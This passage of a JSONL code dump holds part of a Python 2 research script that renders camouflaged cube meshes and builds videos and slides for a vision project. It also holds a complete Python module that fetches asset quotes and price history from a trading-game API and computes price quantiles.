0] <= rect[0] + rect[2], rect[1] <= proj[:, 1], proj[:, 1] <= rect[1] + rect[3])\n pts_in_box = pts[ok]\n thresh = pylab.dist(scan.center(root), scan.center(root+1))/50.\n plane, _ = planefit.fit_plane_ransac(pts_in_box, thresh)\n if plane[1] < 0 and y_flip:\n plane *= -1\n\n ins = planefit.plane_inliers(plane, pts, thresh)\n\n pylab.clf()\n colors = np.zeros_like(pts)\n colors[:, 0] = 255\n colors[ins] = (0, 255, 0)\n\n im_ins = ig.draw_pts(scan.im(root), map(ut.itup, proj), map(ut.itup, colors), width = 2)\n pylab.clf()\n pylab.imshow(im_ins)\n \n print plane\n return plane\n\nvideo_order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-brush2', 'walden-log', \\\n 'disrupt-8', 'charlottesville-1', 'mit-13', 'disrupt-6']\n \ndef test_warp(par = 0, start = 0, end = None):\n #scenes = ['bookshelf-real']#['couch3-real', 'bookshelf-real', 'disrupt-11', 'patio2-real', 'mit-1', 'disrupt-8', 'charlottesville-2']\n # 5: side\n # 4: usually side\n # 3: usually side\n # 2: usually side\n # 1: usually top\n # 0: usually bottom\n # np.array([-0.9286861 , 0.13738529, -0.34448136, -3.96361632])\n scenes = [('disrupt-11', 0, 1, [], []),\n ('charlottesville-2', 0, 1, [], [(8, 9)]),\n ('mit-27', 0, 1, [np.array([ -9.06738777e-01, 2.58900135e-03, 4.21684821e-01, 2.93683015e+00])], []),\n ('disrupt-6', 0, 1, [np.array([ 0.85136312, 0.18874681, -0.48944405, -1.52800028])], []),\n ('couch3-real', 0, 1, [np.array([-0.60995728, 0.15168697, -0.77778094, -0.88194374])], []),\n ('couch5-real', 2, 1, [], []),\n ('disrupt-8', 0, 1, [np.array([-0.92784247, 0.1387372 , -0.34620851, -3.97233358])], []),\n ('mit-13', 0, -1, [], []),\n ('mit-20', 0, -1, [], []),\n ('bookshelf-real', 3, -1, [], [])]\n# ('disrupt-6', 0, 1, [], [np.array([ 0.85139516, 0.190946 , -0.48853444, -1.52601666])]),\n for x in ALL_SCENES:\n if x not in map(ut.fst, scenes):\n scenes.append((x, 0, 1, [], []))\n #print scenes\n\n #scenes = scenes[start:end]\n scenes = sorted(scenes, key = lambda x : (len(video_order) if x[0] not in video_order else video_order.index(x[0]), x[0]))\n scenes = scenes[start:end]\n ip.reset(par)\n\n scene_alg = dict(find_best_algs())\n\n #scene_names = [y[0] for y in scenes]\n for scene, plane_idx, order, other_planes, bad_pairs in scenes:\n #texel_colors = ut.load(ut.pjoin(make_path('noloo', 'interior-wide', scene), 'data.pk'))['ret'][0]\n alg = 'random' #scene_alg[scene]\n texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0]\n scan = dset.Scan(ut.pjoin('../data/', scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n #tour.tour(scan, mesh, texel_colors, [0, 1, 2, 3], par = par)\n if 0:\n if order == 1:\n frames = range(scan.length)\n else:\n frames = list(reversed(range(scan.length)))\n else:\n frames = sorted(set(map(int, np.linspace(0, scan.length-1, 6))))\n if order != 1:\n frames = list(reversed(frames))\n \n #print 'before mem usage'\n #ut.mem_usage()\n print scene, alg\n # url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx,\n # other_planes = other_planes, bad_pairs = bad_pairs,\n # outline_start = 0, outline_end = 1, start_wo_outline = True, par = par)\n \n #url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx, other_planes = other_planes, bad_pairs = bad_pairs, outline_start = scan.length/2, par = par)\n url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx, other_planes = other_planes, bad_pairs = bad_pairs, par = par)\n f = open('../results/vid-list', 'a')\n print >>f, scene, alg, url\n f.close()\n #print other_planes\n #url = tour.tour(scan, mesh, texel_colors, [scan.length-2, scan.length-1], n = 5, plane_idx = plane_idx, other_planes = other_planes, par = par)\n #print 'after mem usage'\n #ut.mem_usage()\n\ndef make_warps():\n for i in xrange(len(ALL_SCENES)):\n os.system('python -c \"import figures; figures.test_warp(par = 1, start = %d, end = %d+1)\"' % (i, i))\n\ndef collect_warps():\n urls = [x.split() for x in ut.lines('../results/vid-results')]\n base = '/data/vision/billf/aho-billf/www/tab'\n out = ut.make_temp_dir(dir = base)\n f = open(ut.pjoin(out, 'index.html'), 'w')\n for _, _, url in urls:\n last = url.split('/')[-1]\n path = os.path.join(base, last)\n page_in = open(ut.pjoin(path, 'index.html'), 'r')\n f.write(page_in.read() + '\\n')\n for y in glob.glob(path + '/*.mp4'):\n os.system('ln -s %s %s/' % (y, out))\n f.close()\n os.system('chmod -R a+rwx %s' % out)\n print ut.pjoin(imtable.PUBLIC_URL, out.split('/')[-1])\n\nclass MeshOcc:\n def __init__(self, scan, mask_path = None):\n self.scan = scan\n self.path = mask_path\n\n def mask(self, frame):\n if self.path is None:\n return np.zeros(self.scan.im(frame).shape[:2])\n else:\n fname = os.path.join(self.path, 'masked%d.png'% (frame+1))\n if os.path.exists(fname):\n mask = np.all(ig.load(fname) == (255, 0, 255), axis = 2)\n mask = 255*np.array(mask, 'd')\n mask = ig.resize(mask, self.scan.scale, hires = 1)/255.\n return mask\n else:\n return np.zeros(self.scan.im(frame).shape[:2])\n\n def apply_mask(self, im_mesh, im_nomesh, mask):\n return im_mesh*(1.-mask[:,:,np.newaxis]) + im_nomesh*mask[:,:,np.newaxis]\n \ndef make_videos():\n # order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-brush2', 'mit-27', 'mit-1', 'walden-log', \\\n # 'mit-5', 'charlottesville-1', 'couch3-real', 'disrupt-6', 'disrupt-8', 'mit-13']\n print 'tmp'\n video_order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-log', \\\n 'disrupt-8', 'charlottesville-1', 'mit-13', 'disrupt-6']\n vids = []\n #urls = dict([(x.split()[0], x.split()[1:]) for x in ut.lines('../results/vid-results')])\n urls = dict([(x.split()[0], x.split()[1:]) for x in ut.lines('../results/vid-list')])\n base = '/data/vision/billf/aho-billf/www/tab'\n for scene in video_order:\n alg, url = urls[scene]\n print 'alg', alg\n last = url.split('/')[-1]\n path = os.path.join(base, last)\n vids.append(glob.glob(path + '/*.mp4')[0])\n\n print '\\n'.join(vids)\n ut.write_lines('../results/ffmpeg-vid-list', ['file %s' % s for s in vids])\n os.system('ffmpeg -f concat -i ../results/ffmpeg-vid-list -c copy /data/vision/billf/aho-billf/www/camo-vid.mp4')\n\n\n \ndef make_nondetect_slide(todo, par = False):\n ip.reset(par)\n scene = 'bookshelf-real'\n #scan = dset.Scan(ut.pjoin('../data/', scene))\n #scan = dset.Scan(ut.pjoin('../data/', scene), max_dim = 500.)\n scan = dset.Scan(ut.pjoin('../data/', scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n\n frame = 6\n \n # fix the mesh\n lf = frame-1\n\n if 'move' in todo:\n # front\n plane1 = mesh.face_planes[5]\n # side\n plane2 = mesh.face_planes[4]\n pt1 = mesh.mesh_pts[mesh.face_idx[lf][0]]\n pt2 = mesh.mesh_pts[mesh.face_idx[lf][1]]\n\n table = []\n # for d in np.linspace(0.8, 0.9, 5):\n # for d2 in np.linspace(0.05, 0.5, 5):\n\n for d in [0.85]:\n for d2 in [1-0.85]:\n #for d3 in [0.1, 0.11, 0.12, 0.15]:\n for d3 in [0.15]:\n for d4 in [0, 0.025, 0.05, 0.1]:\n\n if 1:\n bottom = 1\n top = 0\n\n mesh_pts = mesh.mesh_pts.copy()\n\n for i in xrange(scan.length):\n if i in (top, bottom):\n pts = mesh.mesh_pts[mesh.face_idx[i]].copy()\n c = np.mean(pts, axis = 0)\n mesh_pts[mesh.face_idx[i]] = c + d*(pts - c)\n\n if i == top:\n mesh_pts[mesh.face_idx[i]] -= d2*pylab.dist(pt1, pt2)*mesh.face_planes[i][:3]\n\n #mesh2 = box.Mesh(mesh.face_idx, mesh_pts)\n\n #mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane[:3]*0.07*pylab.dist(pt1, pt2))\n mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane1[:3]*d3*pylab.dist(pt1, pt2))\n mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane2[:3]*d4*pylab.dist(pt1, pt2))\n table.append([d, d2, d3, d4] + [box.draw_faces(mesh2, scan, i) for i in scan.frames])\n ig.show(table)\n \n #frame = 3\n\n\n\n #lf = 1\n lf = frame-1\n d = np.linalg.norm(scan.center(lf) - scan.center(lf-1))\n pt = scan.center(lf) + 1.05*d*np.array([0., 1., 0]) #0.1*mesh.face_planes[-1][:3]*d\n im = scan.im(lf)\n\n #VDIR = mvg.ray_dirs(scan.K(lf), im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2]\n\n texel_colors = np.zeros((mesh.ntexels, 3))\n for face in xrange(6):\n print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3])))\n texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt),\n ut.normalized(mesh.face_planes[face][:3])))\n\n #texel_colors *= 225/float(np.max(texel_colors))\n texel_colors *= 255/float(np.max(texel_colors))\n\n lighting_colors = texel_colors.copy()\n ut.save('../results/bookshelf-lighting.pk', lighting_colors)\n\n mesh_occ = MeshOcc(scan, '../results/bookshelf-masks')\n\n def mesh_render(*args, **kwargs):\n kwargs['mask'] = mesh_occ.mask(args[1])\n return mesh.render(*args, **kwargs)\n \n if 'lighting' in todo:\n ig.show([[mesh_render(scan, f, texel_colors), scan.im_with_real(f)] for f in range(scan.length)])\n\n geom = camo.Geom(scan, mesh)\n \n if 'random' in todo:\n #for other_frame in xrange(scan.length):\n table = []\n for frame1 in scan.frames:\n _, texel_colors = camo.project_texels(scan, frame1, mesh, scan.im(frame1), geom)\n table.append([])\n for frame2 in scan.frames:\n table[-1] += [frame1, frame2, mesh_render(scan, frame2, texel_colors)]\n ig.show(table)\n\n if 'tour-random' in todo:\n #frames = [6, 0]\n #frames = [6, 2]\n frames = [6, 3]\n valid, proj_colors = camo.project_texels(scan, frames[0], mesh, scan.im(frames[0]), geom)\n texel_colors = lighting_colors.copy()\n texel_colors[valid] = proj_colors[valid]\n\n tour.tour(scan, mesh, texel_colors, frames, plane_idx = 3, par = par)\n\n if 'distortion-real' in todo:\n src_frame = 2\n view_frame = 1\n face = 2\n scan_tour = dset.Scan(ut.pjoin('../data/', scene))\n colors = lighting_colors.copy()\n colors[:] = 200\n colors[mesh.tex2juv[:, :, 0] == face] = (0, 128, 0)\n\n table = []\n valid, proj_colors = camo.project_texels(scan_tour, src_frame, mesh, scan_tour.im(src_frame), geom)\n colors[valid] = proj_colors\n table.append(mesh_render(scan_tour, view_frame, colors))\n \n ig.show(table)\n\n\n if 'distortion-synthetic' in todo:\n proj_frame = 2\n view_frame = 1\n \n im = scan.im(proj_frame).copy()\n mask = box.mask(scan, mesh, proj_frame)\n\n #pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/zebra-stripes-vector/zebra-stripes.png')\n #pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/checkers/Checkerboard_pattern.png')\n pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/checkers/Checkerboard_pattern.jpg')\n #pattern = pattern.transpose([1, 0, 2])\n\n ys, xs = np.nonzero(mask)\n rect = ut.bbox2d(zip(xs, ys))\n\n s = 1.02*max(float(rect[3]) / pattern.shape[0], float(rect[2]) / pattern.shape[1])\n\n pattern = ig.resize(pattern, s)\n\n cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))\n ig.sub_img(im, ut.rect_centered_at(cx, cy, pattern.shape[1], pattern.shape[0]))[:] = pattern\n\n _, texel_colors = camo.project_texels(scan, proj_frame, mesh, im, geom)\n texel_colors = texel_colors * np.array(lighting_colors, 'd')/255. \n\n table = []\n # table.append(mesh_render(scan, view_frame, texel_colors, im = 255+np.zeros_like(im)))\n # table.append(mesh_render(scan, proj_frame, texel_colors, im = 255+np.zeros_like(im)))\n table.append(mesh_render(scan, view_frame, texel_colors))\n table.append(mesh_render(scan, proj_frame, texel_colors))\n ig.show(table)\n \n if 'tour-cues' in todo:\n #ntour = 5\n ntour = 40\n do_tours = False\n \n #scan_tour = dset.Scan(ut.pjoin('../data/', scene), max_dim = 500.)\n scan_tour = dset.Scan(ut.pjoin('../data/', scene))\n frames = [6, 2]\n valid, proj_colors = camo.project_texels(scan_tour, frames[0], mesh, scan_tour.im(frames[0]), geom)\n texel_colors = 0.75*lighting_colors.copy()\n texel_colors[valid] = proj_colors[valid]\n\n print 'distortion and occlusion boundary cues'\n if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, n = ntour,\n mesh_occ = mesh_occ, outline_start = 0, outline_end = 1, par = par)\n\n table = []\n # all\n table.append(mesh_render(scan_tour, frames[-1], texel_colors))\n\n sc = 0.4\n im_dark = sc*scan_tour.im(frames[-1])\n table.append(sc*mesh_render(scan_tour, frames[-1], texel_colors))\n ig.show(table)\n table.append(mesh_render(scan_tour, frames[-1], texel_colors, im = im_dark))\n\n # distortion and occlusion\n #for f in [0, 6]:#xrange(6):\n for f in xrange(6):#xrange(6):\n tc = texel_colors.copy()\n tc[mesh.tex2juv[:, 0] != f] *= sc\n table.append([f, mesh_render(scan_tour, frames[-1], tc, im = im_dark)])\n ig.show(table)\n \n print \"what happens if we look at a view that wasn't covered?\"\n frames2 = [2, 0]\n ig.show(mesh_render(scan_tour, frames[-1], tc, im = im_dark))\n if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames2, n = ntour, plane_idx = 3, im_wait = 1, par = par, mesh_occ = mesh_occ)\n\n print 'we can fill it with something...'\n other_frame = 1\n valid2, proj_colors2 = camo.project_texels(scan_tour, other_frame, mesh, scan_tour.im(other_frame), geom)\n\n texel_colors_filled = texel_colors.copy()\n texel_colors_filled[(-valid) & valid2] = proj_colors2[-valid & valid2]\n \n im_dark = sc*scan_tour.im(frames2[-1])\n ig.show([mesh_render(scan_tour, frames2[-1], texel_colors_filled),\n mesh_render(scan_tour, frames2[-1], texel_colors_filled, im = im_dark)])\n \n ig.show([mesh_render(scan_tour, f, texel_colors_filled) for f in scan.frames])\n \n \n #if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, par = par)\n\n\n if 'test-mask' in todo:\n table = []\n #scan = scan_fr = scan_fullres(True, scan.path)\n for frame in scan.frames:\n fname = '../results/bookshelf-masks/im%d-colored.png' % (frame+1)\n if os.path.exists(fname):\n mask = np.all(ig.load(fname) == (255, 0, 255), axis = 2)\n mask = 255*np.array(mask, 'd')\n mask = ig.resize(mask, scan.scale, hires = 1)/255.\n #mask = np.array(ig.resize(np.array(mask, 'd'), scan.scale, order = 1, hires = 0))\n #ig.show(mask)\n im = box.draw_faces(mesh, scan, frame)\n if 0:\n im[mask] = scan.im(frame)[mask]\n if 1:\n im = im*(1.-mask[:,:,np.newaxis]) + mask[:,:,np.newaxis]*scan.im(frame)\n table.append(im)\n\n ig.show(table)\n \n if 'mask' in todo:\n scan_fr = scan_fullres(True, scan.path)\n ig.show([[scan_fr.im(f), box.draw_faces(mesh, scan_fr, f)] for f in scan_fr.frames])\n \n \n if 'zebra' in todo:\n table = []\n # for frame1 in scan.frames:\n # for other_frame in scan.frames: #[scan.length-1]:\n for frame1 in [6]:\n for other_frame in [4]: #[scan.length-1]:\n im = scan.im(other_frame).copy()\n mask = box.mask(scan, mesh, other_frame)\n\n pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/zebra-stripes-vector/zebra-stripes.png')\n pattern = pattern.transpose([1, 0, 2])\n\n ys, xs = np.nonzero(mask)\n #cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))\n rect = ut.bbox2d(zip(xs, ys))\n\n s = 1.02*max(float(rect[3]) / pattern.shape[0], float(rect[2]) / pattern.shape[1])\n\n print s\n\n pattern = ig.resize(pattern, s)\n\n #ig.sub_img(im, rect)[:] = pattern\n cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))\n ig.sub_img(im, ut.rect_centered_at(cx, cy, pattern.shape[1], pattern.shape[0]))[:] = pattern\n \n _, texel_colors = camo.project_texels(scan, other_frame, mesh, im, geom)\n\n texel_colors = texel_colors * np.array(lighting_colors, 'd')/255.\n\n table.append([frame1, other_frame, mesh_render(scan, frame1, texel_colors), mesh_render(scan, frame1, lighting_colors), scan.im_with_real(frame1)])\n\n ig.show(table)\n\ndef make_octopus_video():\n vids_in = ['../results/Ovulg_Wow_sequence_Silent_RTHWatermark.mov', '../results/Octopus Vulgaris.mov']\n #clips = ['../results/octo-clip1.mov', '../results/octo-clip2.mov']\n clips = ['../results/octo-clip1.mov', '../results/octo-clip2.mp4']\n times = ['-ss 00:00:00 -t 10', '-ss 00:05:48 -t 12.5']\n\n # for vid, clip, time in zip(vids_in, clips, times):\n # os.system('ffmpeg -i \"%s\" %s \"%s\"' % (vid, time, clip))\n \n ut.write_lines('../results/ffmpeg-octopus-list', ['file %s' % s for s in clips])\n os.system('ffmpeg -f concat -i ../results/ffmpeg-octopus-list -c copy ../results/octopus-talk.mp4')\n print 'scp', 'aho@vision11.csail.mit.edu:' + os.path.abspath('../results/octopus-talk.mp4'), '~/Dropbox/cvpr-talk/octopus-talk.mp4'\n \n\ndef spotlight_slides(par = 1):\n scene = 'charlottesville-3'\n alg = 'occlusion-wide'\n scan = dset.Scan(ut.pjoin('../data/', scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n #texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0] \n #lighting_colors = ut.load('../results/bookshelf-lighting.pk')\n\n frame = 0\n lf = 4\n d = np.linalg.norm(scan.center(lf) - scan.center(lf-1))\n pt = scan.center(lf) + 2.05*d*np.array([0., 1., 0]) #1.05*d*np.array([0., 1., 0]) #0.1*mesh.face_planes[-1][:3]*d\n im = scan.im(lf)\n\n #VDIR = mvg.ray_dirs(scan.K(lf), im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2]\n\n texel_colors = np.zeros((mesh.ntexels, 3))\n for face in xrange(6):\n print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3])))\n texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt),\n ut.normalized(mesh.face_planes[face][:3])))\n texel_colors *= 255/float(np.max(texel_colors))\n lighting_colors = texel_colors\n\n im = mesh.render(scan, frame, lighting_colors)\n #ig.show(ig.resize(im, 0.5))\n texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0]\n im_colored = mesh.render(scan, frame, texel_colors)\n ig.show([im, im_colored])\n \n plane_idx = 0\n url = tour.tour(scan, mesh, texel_colors, range(scan.length), plane_idx = plane_idx, par = par, start_scale = 0)\n ig.show(url)\n \n \ndef make_occ_examples(texel_colors=None):\n ut.seed_rng(0)\n\n scene = 'walden-brush2'\n if 0:\n #alg = 'greedy'\n #texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0]\n #render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True)\n scan_fr = dset.Scan(ut.pjoin('../data', scene), max_dim = None)\n mesh = box.load_from_mat(ut.pjoin(scan_fr.path, 'cube.mat'), 512)\n if texel_colors is not None:\n try:\n texel_colors = camo.camo(scan_fr, mesh, ut.Struct(method = 'greedy'))[0]\n except:\n print 'exception'\n\n ut.toplevel_locals()\n\n if 1:\n scan = dset.Scan(ut.pjoin('../data', scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n table = []\n view_frame = 2\n for frame in scan.frames:\n try:\n texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'order', order = [frame]))[0]\n table.append([frame, render_cube(scan.path, mesh, texel_colors, view_frame, 200, fullres = True, outline = False, frame_using_cube = True)])\n except:\n print 'exception'\n ig.show(table)\n return\n \n frame = 2\n im_bg = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True, show_cube = False)\n ig.show(im_bg)\n im_nooutline = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = False, frame_using_cube = True)\n im_outline = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True)\n ig.show([im_bg, im_nooutline, im_outline])\n\n\ndef make_occlusion_slide():\n #scan = dset.Scan('../data/disrupt-14')\n #scan = dset.Scan('../data/walden-tree1')\n scan = dset.Scan('../data/mit-13', max_dim = None)\n #mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), 1024)\n # table = []\n # for frame in scan.frames:\n # view_frame = frame\n # texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'order', order = [frame]))[0]\n # table.append([frame, render_cube(scan.path, mesh, texel_colors, view_frame, 200, fullres = True, outline = True, frame_using_cube = True)])\n # ig.show(table)\n\n #texel = mesh.juv2tex[2, 128, 128]\n #texel = mesh.juv2tex[2, 0, 128]\n #texel = mesh.juv2tex[2, 0, 128]\n texel = mesh.juv2tex[5, 0, 128]\n geom = camo.Geom(scan, mesh)\n \n table = []\n for frame in [0, 2, 4, 6]:#scan.frames:#[0, 1, 4]:\n #table.append(scan.im(frame))\n proj = scan.project(frame, mesh.texel_pts[texel])\n if 1:\n im_grid = draw_grid(scan.im(frame), proj, spacing = [0])\n else:\n im_grid = scan.im(frame)\n label_valid, self_colors = camo.project_texels(scan, frame, mesh, im_grid, geom)\n #im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = False, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False)\n im_nooutline = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = False, frame_using_cube = True)\n im_outline = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True)\n #im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False)\n table.append([str(frame), im_outline, im_nooutline])\n \n #table.append([str(frame), im, scan.im(frame)])\n #table.append(ig.draw_pts(im, proj))\n\n ig.show(table)\n \ndef make_capture_slide():\n scene = 'mit-37'\n scan = dset.Scan(ut.pjoin('../data', scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n \n if 'lighting':\n lf = 13\n d = np.linalg.norm(scan.center(lf) - scan.center(lf-1))\n pt = scan.center(lf) + 2.05*d*np.array([0., 1., 0]) #1.05*d*np.array([0., 1., 0]) #0.1*mesh.face_planes[-1][:3]*d\n #im = scan.im(lf)\n\n #VDIR = mvg.ray_dirs(scan.K(lf), im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2]\n\n texel_colors = np.zeros((mesh.ntexels, 3))\n for face in xrange(6):\n print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3])))\n texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt),\n ut.normalized(mesh.face_planes[face][:3])))\n texel_colors *= 255/float(np.max(texel_colors))\n lighting_colors = texel_colors\n \n # geom = camo.Geom(scan, mesh)\n\n # #texel = mesh.juv2tex[5, 128, 128]\n # texel = mesh.juv2tex[2, 128, 128]\n frames = [8, 10, 13, 15]\n #ig.show([[mesh.render(scan, frame, lighting_colors), scan.im(frame)] for frame in frames])\n\n f1 = 10\n f2 = 14\n #f2 = 8\n geom = camo.Geom(scan, mesh)\n label_valid, tc1 = camo.project_texels(scan, f1, mesh, scan.im(f1), geom)\n label_valid, tc2 = camo.project_texels(scan, f2, mesh, scan.im(f2), geom)\n tc = tc1.copy()\n #ok = label_valid & (mesh.tex2juv[:, 0] == 2) & (mesh.tex2juv[:, 1] > 128)\n ok = (mesh.tex2juv[:, 0] == 1) | (mesh.tex2juv[:, 0] == 5) | (mesh.tex2juv[:, 0] == 3)\n ok = (mesh.tex2juv[:, 1] > 128)\n tc[ok] = tc2[ok]\n #ig.show(mesh.render(scan, f1, tc))\n\n vf = f1\n c1 = render_cube(scan.path, mesh, tc1, vf, 200, outline = True, frame_using_cube = True)\n c2 = render_cube(scan.path, mesh, tc2, vf, 200, outline = True, frame_using_cube = True)\n ch = render_cube(scan.path, mesh, tc, vf, 200, outline = True, frame_using_cube = True)\n ig.show([c1, c2, ch])\n return\n\n # c1 = mesh.render(scan, vf, tc1)\n # c2 = mesh.render(scan, vf, tc2)\n c1 = c2 = ''\n ch = mesh.render(scan, vf, tc)\n ig.show([c1, c2, ch])\n\n \n# def make_camo_game():\n \n# tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, n = ntour,\n# mesh_occ = mesh_occ, outline_start = 0, outline_end = 1, par = par)\n"} {"ext": "py", "sha": "1a3043e75b75a97f65b6d42f53184043eeeaec1b", "content": "import urllib3.request\nimport json\nimport datetime as dt\nfrom urllib3 import exceptions as urlex\nfrom Game.periodictasks.search_alarms import AlarmSearch\nimport pandas as pn\nimport numpy as np\n\nDATE_FORMAT = '%Y-%m-%d'\n\n\ndef str_to_date(strdate):\n \"\"\"\n parses given string to date using global date format\n :param strdate:\n :return date:\n \"\"\"\n return dt.datetime.strptime(strdate, DATE_FORMAT)\n\n\nclass AssetComunication:\n GET_ASSETS = \"getAvailableAssets/\"\n GET_QUOTE = \"getAssetMarketPrice/\"\n GET_HISTORY = \"getAssetHistory/\"\n\n def __init__(self, url):\n self.API_URL = url\n self.alarm_search = AlarmSearch(acom=self)\n\n @staticmethod\n def has_quote(asset):\n \"\"\"\n check if an asset has a valid quote\n :param asset:\n :return boolean:\n \"\"\"\n return asset.buy != -1 and asset.sell != -1\n\n @staticmethod\n def url_to_json(url):\n \"\"\"\n fetch json data from given url\n :param url:\n :return json_response if success, 0 otherwise:\n \"\"\"\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n http = urllib3.PoolManager()\n try:\n res = http.request('GET', url)\n if res.status == 200:\n return json.loads(res.data.decode())\n else:\n return 0\n except urlex.MaxRetryError:\n return 0\n\n def get_asset_names(self):\n \"\"\"\n fetch from API all the available assets (only names)\n :return asset list:\n \"\"\"\n from Game.models import Asset\n url = self.API_URL + self.GET_ASSETS\n json_assets = self.url_to_json(url)\n asset_list = []\n try:\n if json_assets != 0:\n json_assets = json_assets['availableAssets']\n for a in json_assets:\n asset = Asset(name=a['name'], type=a['type'])\n asset_list.append(asset)\n return asset_list\n except KeyError:\n # rollback\n asset_list = []\n finally:\n return asset_list\n\n def get_asset_quote(self, asset):\n \"\"\"\n given an asset (only name is required)\n returns same asset with buy and sell price if both exists\n also searchs for alarms for the given asset.\n :param asset:\n :return asset:\n \"\"\"\n url = self.API_URL + self.GET_QUOTE + asset.name\n asset_quote = self.url_to_json(url)\n try:\n if asset_quote != 0:\n asset.buy = asset_quote['buy']\n asset.sell = asset_quote['sell']\n except KeyError:\n # rollback\n asset.buy = -1\n asset.sell = -1\n finally:\n self.alarm_search.search_for_alarms(asset=asset)\n return asset\n\n def get_asset_type(self, name):\n assets = self.get_asset_names()\n for a in assets:\n if name == a.name:\n return a.type\n return None\n\n def quote_for_assets(self, assets):\n \"\"\"\n maps asset list (only names are required) with same assets with quote\n :param assets:\n :return asset list:\n \"\"\"\n return [self.get_asset_quote(a) for a in assets if\n self.has_quote(self.get_asset_quote(a))]\n\n def get_assets(self):\n \"\"\"\n fetches all the available assets with their respective quotes\n :return asset list:\n \"\"\"\n assets = self.get_asset_names()\n return self.quote_for_assets(assets)\n\n def get_asset_history(self, name, start_date, end_date):\n \"\"\"\n get all history for given asset\n :param name:\n :param start_date:\n :param end_date:\n :return dict [{day: DayString, sell: SELL_PRICE, buy: BUY_PRICE}]:\n \"\"\"\n url = (self.API_URL + self.GET_HISTORY + name + \"/\" +\n start_date + \"/\" + end_date)\n prices = self.url_to_json(url)\n if prices == 0:\n prices = {'error': True}\n return prices\n\n def average_for_asset(self, asset):\n start_date = dt.date.today() - dt.timedelta(days=365 * 2)\n end_date = dt.date.today()\n history = self.get_asset_history(name=asset.name,\n start_date=start_date\n .strftime(DATE_FORMAT),\n end_date=end_date\n .strftime(DATE_FORMAT))\n try:\n prices = history['prices']\n\n sell = [float(p['sell']) for p in prices]\n sell_df = pn.DataFrame(np.array(sell))\n sell_data = sell_df.quantile([0.25, 0.5, 0.75]).to_dict()[0]\n sell_data['first'] = sell_data.pop(0.25)\n sell_data['avg'] = sell_data.pop(0.5)\n sell_data['third'] = sell_data.pop(0.75)\n\n buy = [float(p['buy']) for p in prices]\n buy_df = pn.DataFrame(np.array(buy))\n buy_data = buy_df.quantile([0.25, 0.5, 0.75]).to_dict()[0]\n buy_data['first'] = buy_data.pop(0.25)\n buy_data['avg'] = buy_data.pop(0.5)\n buy_data['third'] = buy_data.pop(0.75)\n\n asset.prices_quantiles = {\n 'buy': buy_data,\n 'sell': sell_data,\n }\n return asset\n except KeyError:\n return\n\n def get_assets_with_average(self):\n \"\"\"\n fetches all the available assets with their respective quotes\n :return asset list:\n \"\"\"\n assets = self.get_assets()\n return [self.average_for_asset(a) for a in assets if a]\n"} {"ext": "py", "sha": "1a30459009d2c7a0caf216fdf23ac44213b2089e", "content": 